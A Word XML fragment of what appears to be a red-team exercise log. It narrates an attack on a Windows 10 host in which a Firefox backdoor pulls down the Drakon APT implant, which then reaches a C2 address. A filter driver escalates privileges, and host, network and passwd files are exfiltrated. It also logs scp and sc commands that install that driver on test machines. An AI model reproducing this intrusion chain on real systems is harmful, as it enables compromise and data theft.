    <w:p w14:paraId="15A02A4A" w14:textId="170AB95E" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="223" w:name="_Toc12600124"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>12:26 -- FiveDirections 3 -- Firefox DNS Drakon APT FileFilter-Elevate</w:t>
      </w:r>
      <w:bookmarkEnd w:id="223"/>
    </w:p>
    <w:p w14:paraId="3C8310B4" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>The attack started by browsing to http://128.55.12.167:8641/config.html, selecting DNS, entering hostname Xx--ls8h.com, file 938527054, and clicking the Visit button.  This triggered the Firefox backdoor to connect out via DNS to XX--ls8h.com.  Drakon APT was downloaded and executed and connected to 128.55.12.167:8640 for C2.  The attacker escalated privileges using the new File System Filter Driver, which looks for processes opening specific files which don’t exist and elevates them.  Once SYSTEM, the attacker exfil’ed the host and network files as well as a passwd file in the home directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B24AF99" w14:textId="7BD1A3B6" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="224" w:name="_yqs0hl5a7846" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="225" w:name="_Toc12600125"/>
      <w:bookmarkEnd w:id="224"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Targets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="225"/>
    </w:p>
    <w:p w14:paraId="19712AC5" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta1-fivedirections-3</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>128.55.12.77</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Windows 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25828529" w14:textId="7C8129F5" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="226" w:name="_34yv4a9kti4s" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="227" w:name="_Toc12600126"/>
      <w:bookmarkEnd w:id="226"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Capabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="227"/>
    </w:p>
    <w:p w14:paraId="1B3B3536"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Firefox Backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49751EC0"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DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D298631"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Drakon APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0DC27F" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>FileFilter-Elevate Driver (File System Filter Driver)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EB3A90" w14:textId="1B1D7A73" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="228" w:name="_qy8klnwhdv7t" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="229" w:name="_Toc12600127"/>
      <w:bookmarkEnd w:id="228"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Benign Activity Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="229"/>
    </w:p>
    <w:p w14:paraId="7232512B" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>12:26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F60DAEE" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>kududyn@kududyn-ProLiant-SL170s-G6:/e5/dist/elevate$ scp 20190503_filemon_win10.zip admin@128.55.12.56:./filemon.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BB9D21" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">admin@128.55.12.56's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6587A519" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">20190503_filemon_win10.zip                                                                                                                         100%   11KB  11.4KB/s   00:00   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD58D12" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E91AEF9" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">kududyn@kududyn-ProLiant-SL170s-G6:/e5/dist/elevate$ scp 20190503_filemon_win10.zip admin@128.55.12.109:./filemon.zip                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F27295" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>The authenticity of host '128.55.12.109 (128.55.12.109)' can't be established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112275BB" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>ECDSA key fingerprint is 19:57:c6:61:f5:ba:87:e6:c8:91:be:88:3d:dc:25:e1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720B31DD" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>Are you sure you want to continue connecting (yes/no)? yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3284EE90" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>Warning: Permanently added '128.55.12.109' (ECDSA) to the list of known hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C0C6C8" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">admin@128.55.12.109's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E96B088" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">20190503_filemon_win10.zip                                                                                                                         100%   11KB  11.4KB/s   00:00  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FF555B" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F7A58F4" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>5D-2 VNC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B35AC4" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32ADC7AD" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>12:27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD213B6" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>Extract C:\Users\Admin\filemon.zip -&gt; Admin\filemon\20190503_filemon_win10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494AFB1E" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C908B1C" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>12:28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30358983" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>Copy filemon.cat, filemon.inf, and filemon.sys to C:\Windows\System32\drivers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E9465A" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>Right click install filemon.inf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603CA36A" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1156069B" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>12:29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C482DC5" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>Run as admin cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6810A0A7" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60F00873" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>C:\WINDOWS\system32&gt;sc query filemon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7380FF30" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36CAC55B" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>SERVICE_NAME: filemon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0203B6" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">        TYPE               : 2  FILE_SYSTEM_DRIVER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145513D1" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">        STATE              : 1  STOPPED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE60355" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">        WIN32_EXIT_CODE    : 1077  (0x435)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791A9583" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">        SERVICE_EXIT_CODE  : 0  (0x0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE6C74B" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">        CHECKPOINT         : 0x0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F782FBC" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">        WAIT_HINT          : 0x0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CC0E92" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F57D7A0" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>C:\WINDOWS\system32&gt;sc start filemon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F7CDC6" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="489DE4B2" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>SERVICE_NAME: filemon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5B4A3E" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">        TYPE               : 2  FILE_SYSTEM_DRIVER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053C149A" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">        STATE              : 4  RUNNING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEF16F5" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">                                (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B50ABFE" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">        WIN32_EXIT_CODE    : 0  (0x0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E2F3D5" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">        SERVICE_EXIT_CODE  : 0  (0x0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB113F0" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">        CHECKPOINT         : 0x0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D56A4B1" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">        WAIT_HINT          : 0x0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF91794" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">        PID                : 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120A7D95" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">        FLAGS              :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37807780" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56753015" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>5D-3 VNC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C27383" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06D65949" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>12:31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682C0030" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>Extract C:\Users\Admin\filemon.zip -&gt; Admin\filemon\20190503_filemon_win10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1013E4" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32D80598" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>12:31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245B6420" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>Copy filemon.cat, filemon.inf, and filemon.sys to C:\Windows\System32\drivers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611CD32D" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29DE3DFD" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>12:32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFCE82E" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>Right click install filemon.inf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A63FB4F" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68ACF44B" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>12:33</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E24BEFB" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>Run as admin cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BF85F0" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38823176" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>C:\WINDOWS\system32&gt;sc query filemon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B05DA5" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A0584B9" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>SERVICE_NAME: filemon</w:t>
      </w:r>
    </w:p>
